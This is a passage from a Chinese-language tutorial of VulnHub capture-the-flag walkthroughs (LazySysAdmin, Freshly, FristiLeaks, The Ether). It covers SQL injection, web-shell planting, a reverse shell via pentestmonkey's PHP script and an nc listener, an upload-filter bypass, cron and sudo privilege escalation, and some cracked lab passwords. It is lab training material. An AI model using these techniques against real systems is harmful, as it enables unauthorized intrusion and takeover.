style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">python <span class="cm-attribute">-c</span> <span class="cm-string">'import pty; pty.spawn("/bin/sh")'</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>但是不知道www-data的密码,所以接下来就要进行提权,先来看一下目标机的详细信息</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ uname</span> <span class="cm-attribute">-r</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">4</span>.4.0-31-generic</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ lsb_release</span> <span class="cm-attribute">-a</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No LSB modules are available.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Distributor ID:<span class="cm-tab" role="presentation" cm-text="  "> </span>Ubuntu</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Description:<span class="cm-tab" role="presentation" cm-text="  ">    </span>Ubuntu <span class="cm-number">14</span>.04.5 LTS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Release:<span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-number">14</span>.04</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Codename:<span class="cm-tab" role="presentation" cm-text="    ">   </span>trusty</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 196px;"></div><div class="CodeMirror-gutters" style="display: none; height: 226px;"></div></div></div></pre><p>所以用CVE-2017-1000112提权即可,但是目标机上没有gcc,这种情况,可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。</p><p>dirb安装方法(kali已自带)</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">wget</span> https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">tar zxvf dirb222.tar.gz</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cd</span> dirb222/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">apt-get install libcurl4-gnutls-dev</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./configure && <span class="cm-builtin">make</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./dirb <span class="cm-comment">#运行即可</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 146px;"></div><div class="CodeMirror-gutters" style="display: none; height: 176px;"></div></div></div></pre><p>参考链接:</p><p><a href='https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/'>VulnHub Walk-through – LazySysAdmin: 1</a></p><p><a href='https://uart.io/2017/12/lazysysadmin-1/'>LazySysAdmin Vulnerable Machine Walk-through</a></p><p> </p><h1><a name='header-n8486' class='md-header-anchor '></a>第六节 Freshly</h1><p> </p><h1><a name='header-n8489' class='md-header-anchor '></a>Vulnhub-TopHatSec: Freshly</h1><h2><a name='header-n8490' class='md-header-anchor '></a>靶机简介</h2><h3><a name='header-n8491' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/tophatsec/Freshly.ova' target='_blank' class='url'>https://download.vulnhub.com/tophatsec/Freshly.ova</a></p><h3><a name='header-n8494' class='md-header-anchor '></a>运行环境</h3><ul><li>Virtualbox</li><li>VM(运行会提示错误,给的解决链接已经404)</li></ul><p>本靶机推荐使用Virtualbox搭建</p><h3><a name='header-n8504' class='md-header-anchor '></a>说明</h3><p>此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。</p><h3><a name='header-n8508' class='md-header-anchor '></a>运行环境</h3><p>将下载的OVA文件导入进Virtualbox即可。</p><h2><a name='header-n8511' class='md-header-anchor '></a>渗透思路</h2><h3><a name='header-n8512' class='md-header-anchor '></a>服务发现</h3><p>端口扫描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>操作系统识别</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>主要端口进一步扫描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>80端口</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>8080</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现8080和443端口均为Web,使用了WordPress。</p><h3><a name='header-n8535' class='md-header-anchor '></a>检测已知服务</h3><p>对wordpress进行扫描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现三个插件有安全问题,但是对进一步渗透帮助不大。在扫描同时,使用<code>nikto</code>对80进行目录扫描,发现phpmyadmin和login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Sqlmap进行检测</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>存在注入</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看数据库</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看WordPress8080库找到wordpress的用户名和密码</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登入后台,修改语言为中文</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_14.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8570' class='md-header-anchor '></a>获取shell</h3><p>wordpress有两种方式拿shell,一种是添加插件,将准备好的格式正确的shell添加到.zip上传。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>还有一种是直接编辑</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>这里采用直接编辑的方式getshell。将shell写入404页面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>本地开NC监听</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>访问404页面
Shell反弹</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看passwd</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_21.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8599' class='md-header-anchor '></a>第七节 FristiLeaks v1.3</h1><h2><a name='header-n8600' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n8601' class='md-header-anchor '></a>下载连接</h3><p><a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent</a> 
<a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova</a></p><h3><a name='header-n8605' class='md-header-anchor '></a>运行环境</h3><ul><li>Virtualbox (二选一)</li><li>Vnware Workstation player</li></ul><h3><a name='header-n8613' class='md-header-anchor '></a>设置</h3><p>根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76 
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>然后开启VM</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_2.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8621' class='md-header-anchor '></a>主机发现</h3><p><code>Netdiscover –r 10.10.10.0/24</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_3.jpg' alt='' referrerPolicy='no-referrer' /><br/></p><p>可以发现目标主机在10.10.10.132的位置</p><h3><a name='header-n8628' class='md-header-anchor '></a>服务发现</h3><p><code>nmap -sS -Pn -T4 -p- 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>可以看到打开了80端口,service为HTTP</p><h3><a name='header-n8635' class='md-header-anchor '></a>详细扫描80端口</h3><p>仅发现开放了80端口,对80端口进行详细探测:</p><p><code>nmap -A -O -p80 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到以下有价值的信息:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">http-robots.txt: 3 disallowed entries</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>浏览一下web站点</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据nmap扫描的结果存在<code>robots.txt</code>文件,查看一下:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>访问以下<code>robots.txt</code>提到的三个路径</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>三个目录内容相同,只有以上画面。</p><p>接着,枚举一下目录:</p><p><code>dirb http://10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>images</code>目录发现几张照片:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看图片,<code>keep-calm</code>似乎是一个提示</p><p>KEEP CALM AND DRINK FRISTI</p><p>尝试访问 <a href='http://10.10.10.132/fristi' target='_blank' class='url'>http://10.10.10.132/fristi</a>/</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现一个登陆口。登录界面存在一个严重安全问题,两个输入框都有自动完成的功能。(包括密码)
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>扫描一下该目录:</p><p><code>dirb http://10.10.10.132/fristi/</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现了<code>upload</code>目录的index页面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看源代码发现线索:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>注释当中的信息表明,此页面是一个叫eezeepz的人留下来的。</p><p>推测,<code>eezeepz</code>或许是账号或者密码</p><p>继续向下,发现一大块用base64编码的字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>复制,写入一个文件,之后使用命令解码:</p><p><code>base64 -d /tmp/encoded.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据文件格式,这是一个PNG格式的图画,保存为PNG格式</p><p><code>base64 -d /tmp/encoded.txt > decoded.png</code></p><p>查看发现一串字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>尝试使用以上获取的信息进行登录:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">username:eezeepz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">password:keKkeKKeKKeKkEkkEk</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登陆成功,发现文件上传。此上传点未做任何过滤,可以直接上传shell文件。</p><p>反弹Shell的脚本木马可以在这里下载:<a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell' target='_blank' class='url'>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cp</span> /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">vi</span> reverse-shell.php</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>修改反弹shell的ip地址和监听端口。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用<code>nc</code>监听端口:</p><p><code>nc -nlvp 8888</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_21.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>根据回显,只有png, jpg, gif 能上传</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>修改一下文件名,后缀加上<code>.jpg</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_23.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
上传成功,打开上传的shell:
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>现在已经得到了一个低端权限
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_25.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8754' class='md-header-anchor '></a>权限提升</h3><p>翻看一下目录,在<code>home</code>目录</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_27.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
看到关键人物eezeepz的家目录</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>notes.txt</code>当中得到提示:
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据提示说明,在/tmp下创建一个<code>runtis</code>文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_30.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/></p><h3><a name='header-n8772' class='md-header-anchor '></a>赋予权限</h3><p>根据<code>notes.txt</code>的提示,在<code>/tmp/runtis</code>当中写入的命令会定时执行,那么,修改<code>/home/admin</code>目录的权限。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_31.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
等待系统执行命令之后,就可以阅读 <code>/home/admin</code> 下的内容了</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>有几个文件。依次看一下。</p><p>cryptpass.py</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_33.jpg' alt='' referrerPolicy='no-referrer' /> 
Cryptepass.txt
​  <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_34.jpg' alt='' referrerPolicy='no-referrer' /> 
whoisyourgodnow.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_35.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>看样子应该是用了py文件去加密的。
重写一下文件:
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>解密试试
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_37.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_38.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
分别得到</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">1.mVGZ3O3omkJLmy2pcuTq  :thisisalsopw123</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>这有可能是用户fristgod 的密码,组合试试</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_39.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
根据报错信息,查了资料:
跟 su 命令的实现有关; B环境上su的实现应该是判断标准输入是不是tty ; 而A环境上su的实现则允许从其他文件读取密码。</p><p>解决方法如下:</p><p><code>Python -c 'import pty;pty.spawn("/bin/sh")'</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_40.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>接下来就可以正常使用了。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_41.jpg' alt='' referrerPolicy='no-referrer' />
​      <br/>
查看一下目录文件:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看<code>.secret_admin_stuff</code>目录文件:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_45.jpg' alt='' referrerPolicy='no-referrer' />
​    
发现这个是个root的文件
权限应该是不够的</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_46.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>查看命令使用记录,<code>history</code>命令执行结果:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_47.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>可以看到<code>fristigod</code>用户一直sudo来执行命令</p><p>尝试输入之前得到的两个密码:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_50.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>成功登陆:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_51.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>使用<code>sudo</code>提升权限,并创建一个shell:</p><p><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_52.jpg' alt='' referrerPolicy='no-referrer' />
​    
直接查看/root下的文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_53.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>读取flag文件,得到flag</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_54.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h1><a name='header-n8868' class='md-header-anchor '></a>第八节 The Ether</h1><h2><a name='header-n8869' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n8870' class='md-header-anchor '></a>下载链接</h3><p><a href='http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip' target='_blank' class='url'>http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip</a></p><h3><a name='header-n8873' class='md-header-anchor '></a>运行环境</h3><ul><li>​本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行<code>vmx</code>文件即可</li><li>靶机:本靶机默认使用了自动获取的上网模式。运行靶机之后,将会桥接到物理网卡,接入网络。</li><li>攻击机:Kali虚拟机运行于virtualbox,同样使用桥接模式,即可访问靶机。</li></ul><h3><a name='header-n8884' class='md-header-anchor '></a>靶机说明</h3><p>本靶机有一定难度,不适合初学者。</p><p>本靶机的渗透目标为渗透进靶机并且找到系统中隐藏的Flag值。</p><p>官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。</p><h2><a name='header-n8891' class='md-header-anchor '></a>信息收集</h2><ul><li>ip发现</li></ul><p>首先看一下Kali的网络配置。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277606485214.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后使用fping发现靶机。<code>fping -asg 192.168.1.0/24</code>发现有本网段有四个相关IP。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277612581371.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口扫描与服务识别</li></ul><p>使用nmap快速扫描选项(<code>-F</code>参数)扫描<code>192.168.1.0/24</code>网段</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277613128019.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据<code>Mac</code>可以很明显的区分,<code>192.168.1.1</code>为TP-Link路由器,<code>192.168.1.100</code>为苹果设备,<code>192.168.1.101</code>为VMware虚拟机。可以确定<code>192.168.1.101</code>为目标靶机的IP。</p><p>确定目标IP之后,使用Nmap对目标进行更加详细的探测:
